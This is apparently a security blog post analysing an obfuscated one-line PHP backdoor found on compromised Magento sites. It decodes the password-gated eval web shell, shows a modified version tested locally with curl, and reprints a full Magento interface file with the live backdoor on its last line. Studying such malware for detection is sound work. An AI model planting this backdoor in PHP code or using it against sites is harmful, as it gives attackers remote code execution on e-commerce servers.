Magento PHP One-Liner Backdoor
Outline
A one-liner PHP backdoor has recently been found on multiple compromised ecommerce websites - let us see how it works…
Analysis⌗
The way that this backdoor works is that it uses the PHP function create_function to create a malicious function named a5ec0da19() and then execute it.
However due to some obfuscation this is not immediately clear:
$hdb2c46=@base64_decode('Y3JlYXRlX2Z1bmN0aW9u');if(@function_exists($hdb2c46)){$a5ec0da19 = @$hdb2c46('', @base64_decode('aWYJKAlpc3NldCgkX1BPU1RbcHJvZHVjdF9pZF0pICYmIAltZDUoJF9QT1NUW3Byb2R1Y3RfaWRdCik9PT0iM2JjZWExNDM2YjkwOTZhN2M3MTE4MmI3ZmEwN2NhMWQiKXsJZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFtpbWFnZV9pZF0pKTsJCWV4aXQoKTsgCn0='));@$a5ec0da19();}
$hdb2c46 = @base64_decode('Y3JlYXRlX2Z1bmN0aW9u');
if (@function_exists($hdb2c46))
{
$a5ec0da19 = @$hdb2c46('', @base64_decode('aWYJKAlpc3NldCgkX1BPU1RbcHJvZHVjdF9pZF0pICYmIAltZDUoJF9QT1NUW3Byb2R1Y3RfaWRdCik9PT0iM2JjZWExNDM2YjkwOTZhN2M3MTE4MmI3ZmEwN2NhMWQiKXsJZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFtpbWFnZV9pZF0pKTsJCWV4aXQoKTsgCn0='));
@$a5ec0da19();
}
create_function⌗
This PHP backdoor relies upon base64 encoding to obfuscate its malicious code and evade detection from signature based scanners.
As the function create_function is suspicious - it is obfuscated so we need to base64_decode it:
Y3JlYXRlX2Z1bmN0aW9u —> create_function
eval()⌗
This next base64 string is what will contain the payload meant to be executed by the function created using the previously mentioned create_function:
aWYJKAlpc3NldCgkX1BPU1RbcHJvZHVjdF9pZF0pICYmIAltZDUoJF9QT1NUW3Byb2R1Y3RfaWRdCik9PT0iM2JjZWExNDM2YjkwOTZhN2M3MTE4MmI3ZmEwN2NhMWQiKXsJZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFtpbWFnZV9pZF0pKTsJCWV4aXQoKTsgCn0=
if ( isset($_POST[product_id]) && md5($_POST[product_id]
)==="3bcea1436b9096a7c71182b7fa07ca1d"){ eval(base64_decode($_POST[image_id])); exit();
}
How It’s Used⌗
In order to use this backdoor the attacker must submit a POST request with the following data fields:
-
product_idfield contains data within it that whenMD5hashed must equal3bcea1436b9096a7c71182b7fa07ca1dor else the backdoor will not run. This effectively acts as a password and prevents others from using the backdoor unless they know the proper value to use and run the malware. -
image_idfield contains abase64encoded string which contains PHP code that the attacker wishes to execute when the malicious function$a5ec0da19()is run.
if (isset($_POST[product_id]) && md5($_POST[product_id]) === "3bcea1436b9096a7c71182b7fa07ca1d")
{
eval(base64_decode($_POST[image_id]));
exit();
}
You can always change the MD5 hash value 3bcea1436b9096a7c71182b7fa07ca1d to whatever you want as it is going to be difficult to determine the correct data to place into the product_id field that will match the generated hash 3bcea1436b9096a7c71182b7fa07ca1d unless you are able to crack it.
Test⌗
In order to test out the PHP one-liner shell - we will change out the MD5 hash value from 3bcea1436b9096a7c71182b7fa07ca1d since we do not know what matches it.
It will be replaced with the MD5 hash value 21232f297a57a5a743894a0e4a801fc3 - which is the hash value for the string ‘admin’ - so we will use that as our value for the POST parameter product_id.
if (isset($_POST[product_id]) && md5($_POST[product_id]) === "21232f297a57a5a743894a0e4a801fc3")
{
eval(base64_decode($_POST[image_id]));
exit();
}
For the parameter image_id - I am using a base64 string that decodes to echo 'Code has been evaluated.'; so if everything runs successfully we should see the text “Code has been evaluated.” in the browser or terminal output.
For this I used curl command and assigned the proper values for the two POST parameters product_id and image_id:
curl -d 'product_id=admin' -d 'image_id=ZWNobyAnQ29kZSBoYXMgYmVlbiBldmFsdWF0ZWQuJzs=' http://localhost/oneliner.php
Code has been evaluated.
The PHP shell is successfully working - now try it with whatever code you want evaluated (legally and lawfully).
Sample⌗
The PHP backdoor sample was found injected on the last line of a compromised website’s Magento file.
<?php
/**
* Magento
*
* NOTICE OF LICENSE
*
* This source file is subject to the Open Software License (OSL 3.0)
* that is bundled with this package in the file LICENSE.txt.
* It is also available through the world-wide-web at this URL:
* http://opensource.org/licenses/osl-3.0.php
* If you did not receive a copy of the license and are unable to
* obtain it through the world-wide-web, please send an email
* to license@magento.com so we can send you a copy immediately.
*
* DISCLAIMER
*
* Do not edit or add to this file if you wish to upgrade Magento to newer
* versions in the future. If you wish to customize Magento for your
* needs please refer to http://www.magento.com for more information.
*
* @category Varien
* @package Varien_Db
* @copyright Copyright (c) 2006-2020 Magento, Inc. (http://www.magento.com)
* @license http://opensource.org/licenses/osl-3.0.php Open Software License (OSL 3.0)
*/
/**
* Varien Database Adapter Interface
*
* @category Varien
* @package Varien_Db
* @author Magento Core Team <core@magentocommerce.com>
*/
interface Varien_Db_Adapter_Interface
{
const INDEX_TYPE_PRIMARY = 'primary';
const INDEX_TYPE_UNIQUE = 'unique';
const INDEX_TYPE_INDEX = 'index';
const INDEX_TYPE_FULLTEXT = 'fulltext';
const FK_ACTION_CASCADE = 'CASCADE';
const FK_ACTION_SET_NULL = 'SET NULL';
const FK_ACTION_NO_ACTION = 'NO ACTION';
const FK_ACTION_RESTRICT = 'RESTRICT';
const FK_ACTION_SET_DEFAULT = 'SET DEFAULT';
const INSERT_ON_DUPLICATE = 1;
const INSERT_IGNORE = 2;
const ISO_DATE_FORMAT = 'yyyy-MM-dd';
const ISO_DATETIME_FORMAT = 'yyyy-MM-dd HH-mm-ss';
const INTERVAL_SECOND = 'SECOND';
const INTERVAL_MINUTE = 'MINUTES';
const INTERVAL_HOUR = 'HOURS';
const INTERVAL_DAY = 'DAYS';
const INTERVAL_MONTH = 'MONTHS';
const INTERVAL_YEAR = 'YEARS';
/**
* Error message for DDL query in transactions
*/
const ERROR_DDL_MESSAGE = 'DDL statements are not allowed in transactions';
/**
* Begin new DB transaction for connection
*
* @return Varien_Db_Adapter_Pdo_Mysql
*/
public function beginTransaction();
/**
* Commit DB transaction
*
* @return Varien_Db_Adapter_Pdo_Mysql
*/
public function commit();
/**
* Roll-back DB transaction
*
* @return Varien_Db_Adapter_Pdo_Mysql
*/
public function rollBack();
/**
* Retrieve DDL object for new table
*
* @param string $tableName the table name
* @param string $schemaName the database or schema name
* @return Varien_Db_Ddl_Table
*/
public function newTable($tableName = null, $schemaName = null);
/**
* Create table from DDL object
*
* @param Varien_Db_Ddl_Table $table
* @throws Zend_Db_Exception
* @return Zend_Db_Statement_Interface
*/
public function createTable(Varien_Db_Ddl_Table $table);
/**
* Create temporary table from DDL object
*
* @param Varien_Db_Ddl_Table $table
* @throws Zend_Db_Exception
* @return Zend_Db_Statement_Interface
*/
public function createTemporaryTable(Varien_Db_Ddl_Table $table);
/**
* Drop table from database
*
* @param string $tableName
* @param string $schemaName
* @return boolean
*/
public function dropTable($tableName, $schemaName = null);
/**
* Drop temporary table from database
*
* @param string $tableName
* @param string $schemaName
* @return boolean
*/
public function dropTemporaryTable($tableName, $schemaName = null);
/**
* Truncate a table
*
* @param string $tableName
* @param string $schemaName
* @return Varien_Db_Adapter_Interface
*/
public function truncateTable($tableName, $schemaName = null);
/**
* Checks if table exists
*
* @param string $tableName
* @param string $schemaName
* @return boolean
*/
public function isTableExists($tableName, $schemaName = null);
/**
* Returns short table status array
*
* @param string $tableName
* @param string $schemaName
* @return array|false
*/
public function showTableStatus($tableName, $schemaName = null);
/**
* Returns the column descriptions for a table.
*
* The return value is an associative array keyed by the column name,
* as returned by the RDBMS.
*
* The value of each array element is an associative array
* with the following keys:
*
* SCHEMA_NAME => string; name of database or schema
* TABLE_NAME => string;
* COLUMN_NAME => string; column name
* COLUMN_POSITION => number; ordinal position of column in table
* DATA_TYPE => string; SQL datatype name of column
* DEFAULT => string; default expression of column, null if none
* NULLABLE => boolean; true if column can have nulls
* LENGTH => number; length of CHAR/VARCHAR
* SCALE => number; scale of NUMERIC/DECIMAL
* PRECISION => number; precision of NUMERIC/DECIMAL
* UNSIGNED => boolean; unsigned property of an integer type
* PRIMARY => boolean; true if column is part of the primary key
* PRIMARY_POSITION => integer; position of column in primary key
* IDENTITY => integer; true if column is auto-generated with unique values
*
* @param string $tableName
* @param string $schemaName OPTIONAL
* @return array
*/
public function describeTable($tableName, $schemaName = null);
/**
* Create Varien_Db_Ddl_Table object by data from describe table
*
* @param $tableName
* @param $newTableName
* @return Varien_Db_Ddl_Table
*/
public function createTableByDdl($tableName, $newTableName);
/**
* Modify the column definition by data from describe table
*
* @param string $tableName
* @param string $columnName
* @param array|string $definition
* @param boolean $flushData
* @param string $schemaName
* @return Varien_Db_Adapter_Pdo_Mysql
*/
public function modifyColumnByDdl($tableName, $columnName, $definition, $flushData = false, $schemaName = null);
/**
* Rename table
*
* @param string $oldTableName
* @param string $newTableName
* @param string $schemaName
* @return boolean
*/
public function renameTable($oldTableName, $newTableName, $schemaName = null);
/**
* Rename several tables
*
* @param array $tablePairs array('oldName' => 'Name1', 'newName' => 'Name2')
*
* @return boolean
* @throws Zend_Db_Exception
*/
public function renameTablesBatch(array $tablePairs);
/**
* Adds new column to the table.
*
* Generally $defintion must be array with column data to keep this call cross-DB compatible.
* Using string as $definition is allowed only for concrete DB adapter.
*
* @param string $tableName
* @param string $columnName
* @param array|string $definition string specific or universal array DB Server definition
* @param string $schemaName
* @return Varien_Db_Adapter_Interface
*/
public function addColumn($tableName, $columnName, $definition, $schemaName = null);
/**
* Change the column name and definition
*
* For change definition of column - use modifyColumn
*
* @param string $tableName
* @param string $oldColumnName
* @param string $newColumnName
* @param array|string $definition
* @param boolean $flushData flush table statistic
* @param string $schemaName
* @return Varien_Db_Adapter_Interface
*/
public function changeColumn($tableName, $oldColumnName, $newColumnName, $definition, $flushData = false,
$schemaName = null);
/**
* Modify the column definition
*
* @param string $tableName
* @param string $columnName
* @param array|string $definition
* @param boolean $flushData
* @param string $schemaName
* @return Varien_Db_Adapter_Interface
*/
public function modifyColumn($tableName, $columnName, $definition, $flushData = false, $schemaName = null);
/**
* Drop the column from table
*
* @param string $tableName
* @param string $columnName
* @param string $schemaName
* @return boolean
*/
public function dropColumn($tableName, $columnName, $schemaName = null);
/**
* Check is table column exists
*
* @param string $tableName
* @param string $columnName
* @param string $schemaName
* @return boolean
*/
public function tableColumnExists($tableName, $columnName, $schemaName = null);
/**
* Add new index to table name
*
* @param string $tableName
* @param string $indexName
* @param string|array $fields the table column name or array of ones
* @param string $indexType the index type
* @param string $schemaName
* @return Zend_Db_Statement_Interface
*/
public function addIndex($tableName, $indexName, $fields, $indexType = self::INDEX_TYPE_INDEX, $schemaName = null);
/**
* Drop the index from table
*
* @param string $tableName
* @param string $keyName
* @param string $schemaName
* @return bool|Zend_Db_Statement_Interface
*/
public function dropIndex($tableName, $keyName, $schemaName = null);
/**
* Returns the table index information
*
* The return value is an associative array keyed by the UPPERCASE index key (except for primary key,
* that is always stored under 'PRIMARY' key) as returned by the RDBMS.
*
* The value of each array element is an associative array
* with the following keys:
*
* SCHEMA_NAME => string; name of database or schema
* TABLE_NAME => string; name of the table
* KEY_NAME => string; the original index name
* COLUMNS_LIST => array; array of index column names
* INDEX_TYPE => string; lowercase, create index type
* INDEX_METHOD => string; index method using
* type => string; see INDEX_TYPE
* fields => array; see COLUMNS_LIST
*
* @param string $tableName
* @param string $schemaName
* @return array
*/
public function getIndexList($tableName, $schemaName = null);
/**
* Add new Foreign Key to table
* If Foreign Key with same name is exist - it will be deleted
*
* @param string $fkName
* @param string $tableName
* @param string $columnName
* @param string $refTableName
* @param string $refColumnName
* @param string $onDelete
* @param string $onUpdate
* @param boolean $purge trying remove invalid data
* @param string $schemaName
* @param string $refSchemaName
* @return Varien_Db_Adapter_Interface
*/
public function addForeignKey($fkName, $tableName, $columnName, $refTableName, $refColumnName,
$onDelete = self::FK_ACTION_CASCADE, $onUpdate = self::FK_ACTION_CASCADE,
$purge = false, $schemaName = null, $refSchemaName = null);
/**
* Drop the Foreign Key from table
*
* @param string $tableName
* @param string $fkName
* @param string $schemaName
* @return Varien_Db_Adapter_Interface
*/
public function dropForeignKey($tableName, $fkName, $schemaName = null);
/**
* Retrieve the foreign keys descriptions for a table.
*
* The return value is an associative array keyed by the UPPERCASE foreign key,
* as returned by the RDBMS.
*
* The value of each array element is an associative array
* with the following keys:
*
* FK_NAME => string; original foreign key name
* SCHEMA_NAME => string; name of database or schema
* TABLE_NAME => string;
* COLUMN_NAME => string; column name
* REF_SCHEMA_NAME => string; name of reference database or schema
* REF_TABLE_NAME => string; reference table name
* REF_COLUMN_NAME => string; reference column name
* ON_DELETE => string; action type on delete row
* ON_UPDATE => string; action type on update row
*
* @param string $tableName
* @param string $schemaName
* @return array
*/
public function getForeignKeys($tableName, $schemaName = null);
/**
* Creates and returns a new Varien_Db_Select object for this adapter.
*
* @return Varien_Db_Select
*/
public function select();
/**
* Inserts a table row with specified data.
*
* @param mixed $table The table to insert data into.
* @param array $data Column-value pairs or array of column-value pairs.
* @param arrat $fields update fields pairs or values
* @return int The number of affected rows.
*/
public function insertOnDuplicate($table, array $data, array $fields = array());
/**
* Inserts a table multiply rows with specified data.
*
* @param mixed $table The table to insert data into.
* @param array $data Column-value pairs or array of Column-value pairs.
* @return int The number of affected rows.
*/
public function insertMultiple($table, array $data);
/**
* Insert array to table based on columns definition
*
* @param string $table
* @param array $columns the data array column map
* @param array $data
* @return int
*/
public function insertArray($table, array $columns, array $data);
/**
* Inserts a table row with specified data.
*
* @param mixed $table The table to insert data into.
* @param array $bind Column-value pairs.
* @return int The number of affected rows.
*/
public function insert($table, array $bind);
/**
* Inserts a table row with specified data
* Special for Zero values to identity column
*
* @param string $table
* @param array $bind
* @return int The number of affected rows.
*/
public function insertForce($table, array $bind);
/**
* Updates table rows with specified data based on a WHERE clause.
*
* @param mixed $table The table to update.
* @param array $bind Column-value pairs.
* @param mixed $where UPDATE WHERE clause(s).
* @return int The number of affected rows.
*/
public function update($table, array $bind, $where = '');
/**
* Inserts a table row with specified data.
*
* @param mixed $table The table to insert data into.
* @param array $bind Column-value pairs.
* @return int The number of affected rows.
*/
public function insertIgnore($table, array $bind);
/**
* Deletes table rows based on a WHERE clause.
*
* @param mixed $table The table to update.
* @param mixed $where DELETE WHERE clause(s).
* @return int The number of affected rows.
*/
public function delete($table, $where = '');
/**
* Prepares and executes an SQL statement with bound data.
*
* @param mixed $sql The SQL statement with placeholders.
* May be a string or Zend_Db_Select.
* @param mixed $bind An array of data or data itself to bind to the placeholders.
* @return Zend_Db_Statement_Interface
*/
public function query($sql, $bind = array());
/**
* Executes a SQL statement(s)
*
* @param string $sql
* @return Varien_Db_Adapter_Interface
*/
public function multiQuery($sql);
/**
* Fetches all SQL result rows as a sequential array.
* Uses the current fetchMode for the adapter.
*
* @param string|Zend_Db_Select $sql An SQL SELECT statement.
* @param mixed $bind Data to bind into SELECT placeholders.
* @param mixed $fetchMode Override current fetch mode.
* @return array
*/
public function fetchAll($sql, $bind = array(), $fetchMode = null);
/**
* Fetches the first row of the SQL result.
* Uses the current fetchMode for the adapter.
*
* @param string|Zend_Db_Select $sql An SQL SELECT statement.
* @param mixed $bind Data to bind into SELECT placeholders.
* @param mixed $fetchMode Override current fetch mode.
* @return array
*/
public function fetchRow($sql, $bind = array(), $fetchMode = null);
/**
* Fetches all SQL result rows as an associative array.
*
* The first column is the key, the entire row array is the
* value. You should construct the query to be sure that
* the first column contains unique values, or else
* rows with duplicate values in the first column will
* overwrite previous data.
*
* @param string|Zend_Db_Select $sql An SQL SELECT statement.
* @param mixed $bind Data to bind into SELECT placeholders.
* @return array
*/
public function fetchAssoc($sql, $bind = array());
/**
* Fetches the first column of all SQL result rows as an array.
*
* The first column in each row is used as the array key.
*
* @param string|Zend_Db_Select $sql An SQL SELECT statement.
* @param mixed $bind Data to bind into SELECT placeholders.
* @return array
*/
public function fetchCol($sql, $bind = array());
/**
* Fetches all SQL result rows as an array of key-value pairs.
*
* The first column is the key, the second column is the
* value.
*
* @param string|Zend_Db_Select $sql An SQL SELECT statement.
* @param mixed $bind Data to bind into SELECT placeholders.
* @return array
*/
public function fetchPairs($sql, $bind = array());
/**
* Fetches the first column of the first row of the SQL result.
*
* @param string|Zend_Db_Select $sql An SQL SELECT statement.
* @param mixed $bind Data to bind into SELECT placeholders.
* @return string
*/
public function fetchOne($sql, $bind = array());
/**
* Safely quotes a value for an SQL statement.
*
* If an array is passed as the value, the array values are quoted
* and then returned as a comma-separated string.
*
* @param mixed $value The value to quote.
* @param mixed $type OPTIONAL the SQL datatype name, or constant, or null.
* @return mixed An SQL-safe quoted value (or string of separated values).
*/
public function quote($value, $type = null);
/**
* Quotes a value and places into a piece of text at a placeholder.
*
* The placeholder is a question-mark; all placeholders will be replaced
* with the quoted value. For example:
*
* <code>
* $text = "WHERE date < ?";
* $date = "2005-01-02";
* $safe = $sql->quoteInto($text, $date);
* // $safe = "WHERE date < '2005-01-02'"
* </code>
*
* @param string $text The text with a placeholder.
* @param mixed $value The value to quote.
* @param string $type OPTIONAL SQL datatype
* @param integer $count OPTIONAL count of placeholders to replace
* @return string An SQL-safe quoted value placed into the original text.
*/
public function quoteInto($text, $value, $type = null, $count = null);
/**
* Quotes an identifier.
*
* Accepts a string representing a qualified indentifier. For Example:
* <code>
* $adapter->quoteIdentifier('myschema.mytable')
* </code>
* Returns: "myschema"."mytable"
*
* Or, an array of one or more identifiers that may form a qualified identifier:
* <code>
* $adapter->quoteIdentifier(array('myschema','my.table'))
* </code>
* Returns: "myschema"."my.table"
*
* The actual quote character surrounding the identifiers may vary depending on
* the adapter.
*
* @param string|array|Zend_Db_Expr $ident The identifier.
* @param boolean $auto If true, heed the AUTO_QUOTE_IDENTIFIERS config option.
* @return string The quoted identifier.
*/
public function quoteIdentifier($ident, $auto = false);
/**
* Quote a column identifier and alias.
*
* @param string|array|Zend_Db_Expr $ident The identifier or expression.
* @param string $alias An alias for the column.
* @param boolean $auto If true, heed the AUTO_QUOTE_IDENTIFIERS config option.
* @return string The quoted identifier and alias.
*/
public function quoteColumnAs($ident, $alias, $auto = false);
/**
* Quote a table identifier and alias.
*
* @param string|array|Zend_Db_Expr $ident The identifier or expression.
* @param string $alias An alias for the table.
* @param boolean $auto If true, heed the AUTO_QUOTE_IDENTIFIERS config option.
* @return string The quoted identifier and alias.
*/
public function quoteTableAs($ident, $alias = null, $auto = false);
/**
* Format Date to internal database date format
*
* @param int|string|Zend_Date $date
* @param boolean $includeTime
* @return Zend_Db_Expr
*/
public function formatDate($date, $includeTime = true);
/**
* Run additional environment before setup
*
* @return Varien_Db_Adapter_Interface
*/
public function startSetup();
/**
* Run additional environment after setup
*
* @return Varien_Db_Adapter_Interface
*/
public function endSetup();
/**
* Set cache adapter
*
* @param Zend_Cache_Backend_Interface $adapter
* @return Varien_Db_Adapter_Interface
*/
public function setCacheAdapter($adapter);
/**
* Allow DDL caching
*
* @return Varien_Db_Adapter_Interface
*/
public function allowDdlCache();
/**
* Disallow DDL caching
*
* @return Varien_Db_Adapter_Interface
*/
public function disallowDdlCache();
/**
* Reset cached DDL data from cache
* if table name is null - reset all cached DDL data
*
* @param string $tableName
* @param string $schemaName OPTIONAL
* @return Varien_Db_Adapter_Interface
*/
public function resetDdlCache($tableName = null, $schemaName = null);
/**
* Save DDL data into cache
*
* @param string $tableCacheKey
* @param int $ddlType
* @return Varien_Db_Adapter_Interface
*/
public function saveDdlCache($tableCacheKey, $ddlType, $data);
/**
* Load DDL data from cache
* Return false if cache does not exists
*
* @param string $tableCacheKey the table cache key
* @param int $ddlType the DDL constant
* @return string|array|int|false
*/
public function loadDdlCache($tableCacheKey, $ddlType);
/**
* Build SQL statement for condition
*
* If $condition integer or string - exact value will be filtered ('eq' condition)
*
* If $condition is array - one of the following structures is expected:
* - array("from" => $fromValue, "to" => $toValue)
* - array("eq" => $equalValue)
* - array("neq" => $notEqualValue)
* - array("like" => $likeValue)
* - array("in" => array($inValues))
* - array("nin" => array($notInValues))
* - array("notnull" => $valueIsNotNull)
* - array("null" => $valueIsNull)
* - array("moreq" => $moreOrEqualValue)
* - array("gt" => $greaterValue)
* - array("lt" => $lessValue)
* - array("gteq" => $greaterOrEqualValue)
* - array("lteq" => $lessOrEqualValue)
* - array("finset" => $valueInSet)
* - array("regexp" => $regularExpression)
* - array("seq" => $stringValue)
* - array("sneq" => $stringValue)
*
* If non matched - sequential array is expected and OR conditions
* will be built using above mentioned structure
*
* @param string $fieldName
* @param integer|string|array $condition
* @return string
*/
public function prepareSqlCondition($fieldName, $condition);
/**
* Prepare value for save in column
* Return converted to column data type value
*
* @param array $column the column describe array
* @param mixed $value
* @return mixed
*/
public function prepareColumnValue(array $column, $value);
/**
* Generate fragment of SQL, that check condition and return true or false value
*
* @param string $condition expression
* @param string $true true value
* @param string $false false value
* @return Zend_Db_Expr
*/
public function getCheckSql($condition, $true, $false);
/**
* Generate fragment of SQL, that check value against multiple condition cases
* and return different result depends on them
*
* @param string $valueName Name of value to check
* @param array $casesResults Cases and results
* @param string $defaultValue value to use if value doesn't confirm to any cases
*
* @return Zend_Db_Expr
*/
public function getCaseSql($valueName, $casesResults, $defaultValue = null);
/**
* Returns valid IFNULL expression
*
* @param string $column
* @param string $value OPTIONAL. Applies when $expression is NULL
* @return Zend_Db_Expr
*/
public function getIfNullSql($expression, $value = 0);
/**
* Generate fragment of SQL, that combine together (concatenate) the results from data array
* All arguments in data must be quoted
*
* @param array $data
* @param string $separator concatenate with separator
* @return Zend_Db_Expr
*/
public function getConcatSql(array $data, $separator = null);
/**
* Returns the configuration variables in this adapter.
* @return array
*/
public function getConfig();
/**
* Generate fragment of SQL that returns length of character string
* The string argument must be quoted
*
* @param string $string
* @return Zend_Db_Expr
*/
public function getLengthSql($string);
/**
* Generate fragment of SQL, that compare with two or more arguments, and returns the smallest
* (minimum-valued) argument
* All arguments in data must be quoted
*
* @param array $data
* @return Zend_Db_Expr
*/
public function getLeastSql(array $data);
/**
* Generate fragment of SQL, that compare with two or more arguments, and returns the largest
* (maximum-valued) argument
* All arguments in data must be quoted
*
* @param array $data
* @return Zend_Db_Expr
*/
public function getGreatestSql(array $data);
/**
* Add time values (intervals) to a date value
*
* @see INTERVAL_* constants for $unit
*
* @param Zend_Db_Expr|string $date quoted field name or SQL statement
* @param int $interval
* @param string $unit
* @return Zend_Db_Expr
*/
public function getDateAddSql($date, $interval, $unit);
/**
* Subtract time values (intervals) to a date value
*
* @see INTERVAL_* constants for $unit
*
* @param Zend_Db_Expr|string $date quoted field name or SQL statement
* @param int|string $interval
* @param string $unit
* @return Zend_Db_Expr
*/
public function getDateSubSql($date, $interval, $unit);
/**
* Format date as specified
*
* Supported format Specifier
*
* %H Hour (00..23)
* %i Minutes, numeric (00..59)
* %s Seconds (00..59)
* %d Day of the month, numeric (00..31)
* %m Month, numeric (00..12)
* %Y Year, numeric, four digits
*
* @param Zend_Db_Expr|string $date quoted field name or SQL statement
* @param string $format
* @return Zend_Db_Expr
*/
public function getDateFormatSql($date, $format);
/**
* Extract the date part of a date or datetime expression
*
* @param Zend_Db_Expr|string $date quoted field name or SQL statement
* @return Zend_Db_Expr
*/
public function getDatePartSql($date);
/**
* Prepare substring sql function
*
* @param Zend_Db_Expr|string $stringExpression quoted field name or SQL statement
* @param int|string|Zend_Db_Expr $pos
* @param int|string|Zend_Db_Expr|null $len
* @return Zend_Db_Expr
*/
public function getSubstringSql($stringExpression, $pos, $len = null);
/**
* Prepare standard deviation sql function
*
* @param Zend_Db_Expr|string $expressionField quoted field name or SQL statement
* @return Zend_Db_Expr
*/
public function getStandardDeviationSql($expressionField);
/**
* Extract part of a date
*
* @see INTERVAL_* constants for $unit
*
* @param Zend_Db_Expr|string $date quoted field name or SQL statement
* @param string $unit
* @return Zend_Db_Expr
*/
public function getDateExtractSql($date, $unit);
/**
* Retrieve valid table name
* Check table name length and allowed symbols
*
* @param string $tableName
* @return string
*/
public function getTableName($tableName);
/**
* Retrieve valid index name
* Check index name length and allowed symbols
*
* @param string $tableName
* @param string|array $fields the columns list
* @param string $indexType
* @return string
*/
public function getIndexName($tableName, $fields, $indexType = '');
/**
* Retrieve valid foreign key name
* Check foreign key name length and allowed symbols
*
* @param string $priTableName
* @param string $priColumnName
* @param string $refTableName
* @param string $refColumnName
* @return string
*/
public function getForeignKeyName($priTableName, $priColumnName, $refTableName, $refColumnName);
/**
* Stop updating indexes
*
* @param string $tableName
* @param string $schemaName
* @return Varien_Db_Adapter_Interface
*/
public function disableTableKeys($tableName, $schemaName = null);
/**
* Re-create missing indexes
*
* @param string $tableName
* @param string $schemaName
* @return Varien_Db_Adapter_Interface
*/
public function enableTableKeys($tableName, $schemaName = null);
/**
* Get insert from Select object query
*
* @param Varien_Db_Select $select
* @param string $table insert into table
* @param array $fields
* @param bool|int $mode
* @return string
*/
public function insertFromSelect(Varien_Db_Select $select, $table, array $fields = array(), $mode = false);
/**
* Get insert queries in array for insert by range with step parameter
*
* @param string $rangeField
* @param Varien_Db_Select $select
* @param int $stepCount
* @return array
*/
public function selectsByRange($rangeField, Varien_Db_Select $select, $stepCount = 100);
/**
* Get update table query using select object for join and update
*
* @param Varien_Db_Select $select
* @param string|array $table
* @return string
*/
public function updateFromSelect(Varien_Db_Select $select, $table);
/**
* Get delete from select object query
*
* @param Varien_Db_Select $select
* @param string $table the table name or alias used in select
* @return string|int
*/
public function deleteFromSelect(Varien_Db_Select $select, $table);
/**
* Return array of table(s) checksum as table name - checksum pairs
*
* @param array|string $tableNames
* @param string $schemaName
* @return array
*/
public function getTablesChecksum($tableNames, $schemaName = null);
/**
* Check if the database support STRAIGHT JOIN
*
* @return boolean
*/
public function supportStraightJoin();
/**
* Adds order by random to select object
* Possible using integer field for optimization
*
* @param Varien_Db_Select $select
* @param string $field
* @return Varien_Db_Adapter_Interface
*/
public function orderRand(Varien_Db_Select $select, $field = null);
/**
* Render SQL FOR UPDATE clause
*
* @param string $sql
* @return string
*/
public function forUpdate($sql);
/**
* Try to find installed primary key name, if not - formate new one.
*
* @param string $tableName Table name
* @param string $schemaName OPTIONAL
* @return string Primary Key name
*/
public function getPrimaryKeyName($tableName, $schemaName = null);
/**
* Converts fetched blob into raw binary PHP data.
* Some DB drivers return blobs as hex-coded strings, so we need to process them.
*
* @mixed $value
* @return mixed
*/
public function decodeVarbinary($value);
/**
* Returns date that fits into TYPE_DATETIME range and is suggested to act as default 'zero' value
* for a column for current RDBMS. Deprecated and left for compatibility only.
* In Magento at MySQL there was zero date used for datetime columns. However, zero date it is not supported across
* different RDBMS. Thus now it is recommended to use same default value equal for all RDBMS - either NULL
* or specific date supported by all RDBMS.
*
* @deprecated after 1.5.1.0
* @return string
*/
public function getSuggestedZeroDate();
/**
* Drop trigger
*
* @param string $triggerName
* @return Varien_Db_Adapter_Interface
*/
public function dropTrigger($triggerName);
/**
* Get adapter transaction level state. Return 0 if all transactions are complete
*
* @return int
*/
public function getTransactionLevel();
/**
* Convert date format to unix time
*
* @param string|Zend_Db_Expr $date
* @return mixed
*/
public function getUnixTimestamp($date);
/**
* Convert unix time to date format
*
* @param int|Zend_Db_Expr $timestamp
* @return mixed
*/
public function fromUnixtime($timestamp);
/**
* Change table auto increment value
*
* @param string $tableName
* @param string $increment
* @param null|string $schemaName
* @return Zend_Db_Statement_Interface
*/
public function changeTableAutoIncrement($tableName, $increment, $schemaName = null);
/**
* Create new table from provided select statement
*
* @param string $tableName
* @param Zend_Db_Select $select
* @param bool $temporary
* @return mixed
*/
public function createTableFromSelect($tableName, Zend_Db_Select $select, $temporary = false);
}
;$hdb2c46=@base64_decode('Y3JlYXRlX2Z1bmN0aW9u');if(@function_exists($hdb2c46)){$a5ec0da19 = @$hdb2c46('', @base64_decode('aWYJKAlpc3NldCgkX1BPU1RbcHJvZHVjdF9pZF0pICYmIAltZDUoJF9QT1NUW3Byb2R1Y3RfaWRdCik9PT0iM2JjZWExNDM2YjkwOTZhN2M3MTE4MmI3ZmEwN2NhMWQiKXsJZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFtpbWFnZV9pZF0pKTsJCWV4aXQoKTsgCn0='));@$a5ec0da19();}
More Research